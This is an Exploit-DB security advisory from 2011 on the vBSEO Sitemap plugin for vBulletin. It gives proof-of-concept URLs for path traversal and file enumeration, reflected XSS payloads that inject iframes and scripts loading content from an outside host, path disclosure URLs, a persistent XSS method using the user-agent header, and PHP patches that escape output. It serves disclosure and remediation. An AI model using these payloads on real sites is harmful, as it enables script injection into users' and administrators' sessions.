vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities

EDB-ID:

16077

CVE:

N/A


Author:

MaXe

Type:

webapps


Platform:

PHP

Date:

2011-01-30


vBSEO Sitemap - Multiple Vulnerabilities


Versions Affected: 2.5 and 3.0 (Most likely all versions)

Info:
A proven success record, vBSEO powers the most optimized forums on the Web.
The #1 SEO plugin and the only professional, fully supported solution. A full
package of SEO enhancements, one install, one upgrade.

External Links:
http://www.vbseo.com

Credits: MaXe (@InterN0T)


-:: The Advisory ::-
vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Please see the details below.

vBSEO Sitemap 3.0 Gold:
Enumeration and confirmation of files:
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt

Proof of Concept XSS: (Non-Persistent)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E

Path Disclosure: (any file in the addon directory - includes fatal errors)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links3.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbagallery.php

----------------------- END OF vBSEO 3.0 -----------------------

vBSEO Sitemap 2.5: (initial first release)

Enumeration and confirmation of files:
http://www.target.tld/vbseo_sitemap/index.php?details=../../robots.txt
http://www.target.tld/vbseo_sitemap/index.php?hitdetails=../../../robots.txt

Non-Persistent XSS: (PoC)
http://www.target.tld/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E
[May require bot hits to work!] http://www.target.tld/vbseo_sitemap/index.php?removedl[0]=&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E
http://www.target.tld/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E

Path Disclosure: (any file in the addon directory - includes fatal errors)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php
http://www.target.tld/includes/functions_vbseo_url.php

----------------------- END OF vBSEO 2.5 -----------------------

vBSEO Sitemap: (Most likely all versions)
Persistent XSS: 
1) The user-agent is not sanitized in a sufficient way allowing an attacker to inject persistent scripts.
2) Then the attacker must request the sitemap via one of the following links:
- http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true
- http://www.target.tld/vbulletin/upload/vbseo_sitemap/vbseo_getsitemap.php?sitemap=sitemap_index.xml.gz

3) Then an authenticated administrator must view one of the pages containing the injected and potentially malicious user-agent:
http://www.target.tld/vbseo_sitemap/index.php?dlist=true&page=357


[!] All vulnerabilities requires authentication and they do not survive a login screen, making them almost harmless.


-:: Solution ::-
Before: (file: index.php within vbseo_sitemap) -- Version 2.5
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td align="right"><?php echo $sdate?></td>
        <td><?php echo $dl['sitemap']?></td>
        <td><b><?php echo $dl['ua']?></b></td>
        <td><?php echo $dl['ip']?></td>
        <td><?php echo $dl['useragent']?></td>
        <td>
<a href="index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$
        </td>
        <td>
<input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>">
        </td>
</tr>

After:_______________________________________________________
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td align="right"><?php echo $sdate?></td>
        <td><?php echo $dl['sitemap']?></td>
        <td><b><?php echo $dl['ua']?></b></td>
        <td><?php echo $dl['ip']?></td>
        <td><?php echo htmlentities($dl['useragent'])?></td>
        <td>
<a href="index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$
        </td>
        <td>
<input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>">
        </td>
</tr>
---------------------------------------------------------------------------------------------

Before: (file: index.php within vbseo_sitemap) -- Version 3.0
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>">

After:_______________________________________________________
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>">
	
---------------------------------------------------------------------------------------------

In addition, vbseo_getsitemap.php which grabs the unsanitized user-agent can also be fixed by finding this line:
'useragent'=>$_SERVER['HTTP_USER_AGENT'],

And changing it to this:
'useragent'=>htmlentities($_SERVER['HTTP_USER_AGENT']),



Disclosure Information:
- Vulnerability found and researched: ~27th December 2010
- Semi-Disclosed at InterN0T: 30th December
- Detailed Disclosure: 31st January 2011


References:
http://forum.intern0t.net/intern0t-advisories/3632-vbseo-sitemap-2-5-3-0-multiple-minor-vulnerabilities.html